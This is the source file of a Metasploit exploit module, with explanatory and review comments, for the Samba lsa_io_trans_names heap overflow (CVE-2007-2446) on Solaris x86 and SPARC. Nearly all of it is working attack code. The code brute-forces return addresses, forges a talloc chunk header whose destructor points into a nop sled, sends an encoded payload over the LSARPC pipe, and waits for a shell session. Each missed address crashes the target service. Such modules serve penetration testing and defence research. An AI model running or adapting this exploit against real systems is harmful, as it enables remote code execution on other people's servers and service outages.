Path: blob/master/modules/exploits/solaris/samba/lsa_transnames_heap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Samba lsa_io_trans_names heap overflow (CVE-2007-2446), Solaris targets.
#
# The vulnerable code is reached over the LSARPC named pipe with a
# LookupSids request whose two entry counts disagree; the module then
# relies on a forged TALLOC chunk header (built in brute_exploit). Per the
# description it only applies to Samba 3.0.21-3.0.24 and fails when the
# server's "log level" is above 2.
#
# Operational footprint, from the 'Notes' metadata and the body of
# brute_exploit: every attempt performs an SMB login and a DCERPC bind to
# the LSARPC pipe, and a missed address crashes the service
# (CRASH_SERVICE_RESTARTS), so a brute-force run is visible as repeated
# logins and repeated smbd restarts in the target's logs (IOC_IN_LOGS).
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  # The Brute mixin is what calls brute_exploit, once per candidate 'Ret'
  # drawn from the selected target's 'Bruteforce' Start/Stop/Step range
  # (the iteration itself lives in the mixin and is not visible here).
  include Msf::Exploit::Brute

  # Module metadata, targets and options.
  #
  # In each target, 'Ret' is the candidate address that brute_exploit writes
  # into the forged talloc destructor field, and 'Nops' is the size of the
  # sled placed in front of the payload. x86 and SPARC get different address
  # ranges; the DEBUG target uses a fixed, recognisable value (Start == Stop,
  # so a single attempt) — presumably for crash triage.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samba lsa_io_trans_names Heap Overflow',
        'Description' => %q{
          This module triggers a heap overflow in the LSA RPC service
          of the Samba daemon. This module uses the TALLOC chunk overwrite
          method (credit Ramon and Adriano), which only works with Samba
          versions 3.0.21-3.0.24. Additionally, this module will not work
          when the Samba "log level" parameter is higher than "2".
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
          'hdm'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2007-2446'],
          ['OSVDB', '34699'],
        ],
        # Declares that the payload runs with the daemon's privileges.
        'Privileged' => true,
        'Payload' => {
          'Space' => 1024
        },
        'Platform' => 'solaris',
        'Targets' => [
          [
            'Solaris 8/9/10 x86 Samba 3.0.21-3.0.24',
            {
              'Platform' => 'solaris',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x082f2000 },
                'Stop' => { 'Ret' => 0x084f2000 },
                'Step' => 60 * 1024
              }
            }
          ],
          [
            'Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24',
            {
              'Platform' => 'solaris',
              'Arch' => [ ARCH_SPARC ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x00322000 },
                'Stop' => { 'Ret' => 0x00722000 },
                'Step' => 60 * 1024
              }
            }
          ],
          [
            # Single attempt with a fixed marker address (Start == Stop).
            'DEBUG',
            {
              'Platform' => 'solaris',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xaabbccdd },
                'Stop' => { 'Ret' => 0xaabbccdd },
                'Step' => 60 * 1024
              }
            }
          ],
        ],
        'DisclosureDate' => '2007-05-14',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    # SMBPIPE: the named pipe to bind to. The default, LSARPC, is the pipe
    # the LSA interface used below is reached through.
    register_options([
      OptString.new('SMBPIPE', [true, 'The pipe name to use', 'LSARPC']),
    ])

    # brute_exploit forces DCERPC::fake_bind_multi to false itself, so the
    # option is hidden rather than offered to the user.
    deregister_options('DCERPC::fake_bind_multi')
  end

  # Need to perform target detection
  # Returning false opts this module out of automatic target selection:
  # the x86 vs SPARC address range has to be chosen explicitly.
  def autofilter
    false
  end

  # One brute-force attempt. The Brute mixin calls this with a hash holding
  # the candidate 'Ret' address for the current iteration.
  #
  # The request is a LookupSids stub made of: the policy handle returned by
  # lsa_open_policy, two deliberately different entry counts (272 / 288),
  # 272 fake 16-byte translated-name entries, padding, a forged talloc chunk
  # header whose destructor pointer is target_addrs['Ret'], the nop sled and
  # the encoded payload. Everything is sent over a fresh SMB/DCERPC session.
  #
  # Outcome handling: no response, EOF or a pipe disconnect is treated as the
  # expected result of a missed address (the service crashes and restarts,
  # see the Stability note); a DCERPC fault is reported as a likely patched
  # server.
  #
  # Side effects: @nops is memoized on the first call,
  # datastore['DCERPC::fake_bind_multi'] is overwritten, and handler /
  # disconnect run at the end of every attempt.
  def brute_exploit(target_addrs)
    # Build the nop sled once; later attempts reuse the same bytes.
    if !@nops
      if (target['Nops'] > 0)
        print_status('Creating nop sled....')
        @nops = make_nops(target['Nops'])
      else
        @nops = ''
      end
    end

    print_status('Trying to exploit Samba with address 0x%.8x...' % target_addrs['Ret'])

    nops = @nops
    pipe = datastore['SMBPIPE'].downcase

    # A new SMB session and login for every candidate address.
    print_status('Connecting to the SMB service...')
    connect
    smb_login

    # Plain single-context bind (the option itself is deregistered in
    # initialize, so this is the module's own setting, not the user's).
    datastore['DCERPC::fake_bind_multi'] = false

    # LSARPC interface UUID, version 0.0, over the named pipe chosen above.
    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # The two counts sent to LookupSids differ on purpose; the missing
    # consistency check between them is what the vulnerable
    # lsa_io_trans_names parsing gets wrong — TODO confirm against the
    # CVE-2007-2446 advisory.
    num_entries = 272
    num_entries2 = 288

    #
    # First talloc_chunk
    # 16 bits align
    # 16 bits sid_name_use
    # 16 bits uni_str_len
    # 16 bits uni_max_len
    # 32 bits buffer
    # 32 bits domain_idx
    #
    # num_entries fake entries of 16 bytes each, per the layout above.
    buf = (('A' * 16) * num_entries)

    # Padding
    buf << 'A' * 8

    # TALLOC_MAGIC
    # Little-endian 0xe814ec70, the magic the affected talloc checks in a
    # chunk's flags field.
    talloc_magic = "\x70\xec\x14\xe8"

    # Second talloc_chunk header
    # The forged header's destructor field carries the brute-forced address;
    # presumably it is invoked when the chunk is freed — this is the "TALLOC
    # chunk overwrite" method named in the description.
    buf << 'A' * 8 # next, prev
    buf << NDR.long(0) + NDR.long(0) # parent, child
    buf << NDR.long(0) # refs
    # NOTE(review): packed little-endian ('V') for every target, including
    # the big-endian SPARC one (as is talloc_magic) — confirm this is intended.
    buf << [target_addrs['Ret']].pack('V') # destructor
    buf << 'A' * 4 # name
    buf << 'A' * 4 # size
    buf << talloc_magic # flags

    # Open a policy handle first; the 20-byte handle it returns becomes the
    # first argument of the LookupSids request.
    stub = lsa_open_policy(dcerpc)

    stub << NDR.long(0) # num_entries
    stub << NDR.long(0) # ptr_sid_enum
    stub << NDR.long(num_entries) # num_entries
    stub << NDR.long(0x20004) # ptr_trans_names
    stub << NDR.long(num_entries2) # num_entries2
    stub << buf
    stub << nops
    stub << payload.encoded

    print_status('Calling the vulnerable function...')

    begin
      # LsarLookupSids (opnum 0x0f)
      dcerpc.call(0x0f, stub)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
      # The service died on a missed address (or is running the payload);
      # either way no reply is the normal case.
      print_status('Server did not respond, this is expected')
    rescue Rex::Proto::DCERPC::Exceptions::Fault
      # A proper RPC fault means the request was parsed and rejected.
      print_error('Server is most likely patched...')
    rescue StandardError => e
      # The SMB layer may surface the crash as a pipe disconnect instead.
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
        print_status('Server disconnected, this is expected')
      else
        print_error("Error: #{e.class}: #{e}")
      end
    end

    # Give the payload handler a chance to pick up a session, then drop the
    # SMB connection used for this attempt.
    handler
    disconnect
  end

  # Issues LSA OpenPolicy (opnum 6) on the given DCERPC client and returns
  # the first 20 bytes of the response stub — the policy handle that
  # brute_exploit prepends to its LookupSids request.
  #
  # server: the server-name field of the request (default '\\').
  # The object attributes carry an LSA QOS block (impersonation 2, context
  # tracking 1, effective-only 0) and the access mask is 0x02000000
  # (MAXIMUM_ALLOWED).
  def lsa_open_policy(dcerpc, server = '\\')
    stubdata =
      # Server
      NDR.uwstring(server) +
      # Object Attributes
      NDR.long(24) + # SIZE
      NDR.long(0) + # LSPTR
      NDR.long(0) + # NAME
      NDR.long(0) + # ATTRS
      NDR.long(0) + # SEC DES
      # LSA QOS PTR
      NDR.long(1) + # Referent
      NDR.long(12) + # Length
      NDR.long(2) + # Impersonation
      NDR.long(1) + # Context Tracking
      NDR.long(0) + # Effective Only
      # Access Mask
      NDR.long(0x02000000)

    dcerpc.call(6, stubdata)

    # Policy handle: the first 20 bytes of the response stub.
    dcerpc.last_response.stub_data[0, 20]
  end
end